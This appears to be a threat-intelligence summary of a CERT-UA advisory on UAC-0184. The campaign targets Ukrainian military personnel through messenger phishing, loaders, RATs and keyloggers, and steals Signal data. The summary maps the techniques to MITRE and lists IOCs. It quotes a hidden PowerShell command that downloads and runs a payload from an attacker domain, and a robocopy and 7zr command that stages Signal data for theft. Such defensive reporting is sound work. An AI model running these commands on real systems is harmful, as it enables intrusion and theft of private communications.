Keypoints
- UAC‑0184 targets Ukrainian Defense Forces personnel, using popular messengers as the primary delivery channel.
- Initial access relies on social engineering: conversation lures, video or legal‑case decoys, and archive/LNK attachments requesting help opening files.
- Deploys loaders (IDAT family: HijackLoader/SHADOWLADDER/GHOSTPULSE) to stage additional payloads such as RemcosRAT, XWorm, and ViottoKeylogger.
- SIGTOP and TUSC are explicitly used to steal and download messaging data, including Signal messages and contacts.
- Observed techniques include PowerShell download/execution, LNK‑based chains, robocopy + 7zr archiving of Signal data, and persistence via Startup LNKs.
- Multiple C2 hosts and domains (e.g., 178.33.57.148/149, 88.151.192.14, i-like-hokku.co.ua, yeah-biches.kyiv.ua) and many malicious files/hashes are listed as IOCs.
- Attackers exfiltrate data to remote servers over HTTPS and custom endpoints, and use keylogging and repository theft to collect credentials and message content.
MITRE Techniques
- [T1566.004] Spearphishing via Service – Messenger platforms used as the primary delivery channel (‘the main channel for the delivery of malware is popular messengers’)
- [T1566.001] Spearphishing Attachment – Malicious archives/LNKs are sent with social‑engineering baits to entice file opening (‘a file (archive) is transferred … with a request for help in opening/processing it’)
- [T1589] Gather Victim Identity Information (Social Engineering) – Adversaries leverage personal posts and profile data to identify priority targets (‘any careless online activity of a serviceman (for example, posting a photo in military uniform) makes it easier for attackers’)
- [T1204] User Execution – Attack relies on the user to open attachments/decoys to execute payloads (‘a file (archive) is transferred … with a request for help in opening/processing it’)
- [T1059] Command and Scripting Interpreter – PowerShell commands download and execute payloads from remote URLs (‘powershell.exe -WindowStyle hidden … -uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe’)
- [T1518] Software Discovery – Tools like SIGTOP/TUSC used to enumerate and extract messaging application data (‘SIGTOP and TUSC are used to steal and download data from computers, in particular, messages and contact data of Signal’)
- [T1213] Data from Information Repositories – Direct theft of Signal messages and contacts from local application stores (‘to steal and download data from computers, in particular, messages and contact data of Signal’)
- [T1056] Input Capture – Use of keyloggers to capture keystrokes and credentials (VIOTTOKEYLOGGER referenced)
- [T1555] Credentials from Password Stores – Combined input capture and repository access to obtain credentials (‘attackers … steal … messenger data’ and use keyloggers)
- [T1048] Exfiltration Over Alternative Protocol – Stolen data sent to various remote hosts and HTTPS endpoints (numerous C2 IPs/domains and filebin/file hosting links listed)
Indicators of Compromise
- [File names & hashes] delivery & payloads – securitycheck.exe (cb4c21ab… e72f17d6…), remcos.exe (6b95e337… 8dc1d26c…), and many additional filenames/hashes listed in the report
- [Malicious executables] implants & tools – ViottoKeylogger.exe (f601e9ba…), XClient3.exe (c975a325…), sigtop.exe (6da225a4…), up.exe (79f98fa6…), and other binaries
- [File paths / Hosts] persistence & staging locations – %APPDATA%ServiceUltrathermochemistry.iso, %APPDATA%DDP_BrowserASUS_WMI.dll, %APPDATA%FFO_archive_3JRWeb.exe, and numerous %APPDATA% / %TMP% paths
- [PowerShell / Commands] observed delivery commands – examples of hidden PowerShell downloads (‘powershell.exe -WindowStyle hidden … -uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe’)
- [Network IPs] C2 and staging servers – 178.33.57.148:443, 88.151.192.14:443, 178.33.57.149:443, and other IPs (178.33.57.159:8899, 185.196.11.194, 94.156.66.107)
- [Domains / URLs] malicious hosts & payload URLs – i‑like‑hokku.co.ua, yeah‑biches.kyiv.ua, the‑new‑age.co.ua, and file hosting links (e.g., hXXps://filebin.net/…/921292777.png)
UAC‑0184 infection chains typically begin with a social‑engineered message via a messenger that delivers an archive or LNK decoy (legal documents, video, or acquaintance requests). When opened, LNKs or archive contents invoke concealed PowerShell commands that download staged payloads (examples observed: http://yeah-biches.kyiv.ua/securitycheck.exe and http://i-like-hokku.co.ua/sud/dvs.exe) and execute them, placing binaries under %APPDATA% and %TMP% folders and creating startup LNKs for persistence.
Attackers use IDAT loaders (HijackLoader / SHADOWLADDER / GHOSTPULSE) to deploy remote administration and surveillance tools such as RemcosRAT, XWorm, and ViottoKeylogger, while SIGTOP and TUSC are used to enumerate and extract messaging data (notably Signal messages and contacts). Post‑compromise activity includes archiving Signal data via robocopy and 7zr (e.g., robocopy %appdata%Signal %appdata%MyDataSignal /E & %temp%7zr.exe a %appdata%MyData%computername%%username%.7z %appdata%MyDataSignal) and exfiltration to multiple C2 hosts over HTTPS and custom endpoints (observed C2s: 178.33.57.148/149, 88.151.192.14 and domains like yeah-biches.kyiv.ua).
Observed technical IOCs include numerous payload filenames and hashes (securitycheck.exe, remcos.exe, ViottoKeylogger.exe, sigtop.exe, up.exe), specific %APPDATA%/%TMP% staging paths, PowerShell download/execute commands, startup LNK persistence, and listed C2 IPs/domains and file hosting URLs for exfiltration and payload hosting.
Read more: https://cert.gov.ua/article/6278521